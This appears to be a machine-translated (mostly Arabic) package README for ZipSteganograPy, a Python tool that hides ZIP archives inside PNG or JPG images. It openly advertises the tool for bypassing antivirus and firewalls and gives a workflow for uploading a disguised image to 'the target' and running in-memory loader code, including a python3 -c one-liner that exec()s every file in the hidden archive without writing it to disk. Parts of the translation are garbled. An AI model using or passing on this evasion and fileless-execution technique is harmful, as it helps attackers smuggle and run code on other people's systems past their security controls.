ZipSteganograPy
1.0.0
هذه الأداة تخفي أرشيف الرمز البريدي في صورة.
هذه الأداة مفيدة لتجاوز مكافحة الفيروسات وجدار الحماية.
تتطلب هذه الحزمة:
pip install ZipSteganograPy # Hide a ZIP archive in an image:
python3 ZipSteganograPy.py -z archive.zip -o stegano -i image.png
python3 ZipSteganograPy.pyz -z archive.zip -o stegano -i image.jpg
# Create a ZIP archive (with 3 text files) and hide it in an image:
python3 -m ZipSteganograPy -f file1.txt file2.txt file3.txt -i image.jpg
ZipSteganograPy -f file1.txt file2.txt file3.txt -i image.png
# Easily extract the hidden archive using python3 and its standard library:
python3 -m zipfile -l stegano.png # list files
python3 -m zipfile -e stegano.jpg output/ # extract
# Easily extract the hidden archive using unzip package:
unzip stegano.jpg -l # list files
unzip stegano.jpg -d output/ # extractهذا المثال قم بتحميل رمز Python من صورة وتنفيذها دون كتابتها على القرص.
هذه الطريقة تجاوز:
from zipfile import ZipFile
with ZipFile ( "stegano.png" , "r" ) as f :
for filename in f . namelist ():
exec ( f . read ( filename ). decode ())على جهاز الكمبيوتر الخاص بك:
ZipSteganograPy -f hello.py -i ZipSteganograPy_small.png
# ZipSteganograPy Copyright (C) 2022 Maurice Lambert
# This program comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under certain conditions.
# New image 'stegano.png' created from 'ZipSteganograPy_small.png' with hidden ZIP archive. قم بتحميل ملف stegano.png على الهدف (من المحتمل ألا يكون ملف zip anyze بواسطة جدران الحماية لأنه سيتم اكتشاف الملف كصورة صحيحة).
على الهدف (قم بفك الضغط من الصورة وتنفيذ رمز Python الخاص بك دون كتابته على القرص):
from zipfile import ZipFile
with ZipFile ( "stegano.png" , "r" ) as f :
for filename in f . namelist ():
exec ( f . read ( filename ). decode ()) import zipfile ; f = zipfile . ZipFile ( "stegano.png" , "r" );[ exec ( f . read ( filename ). decode ()) for filename in f . namelist ()]python3 -c ' import zipfile;f=zipfile.ZipFile("stegano.png", "r");[exec(f.read(filename).decode()) for filename in f.namelist()] ' مرخصة تحت GPL ، الإصدار 3.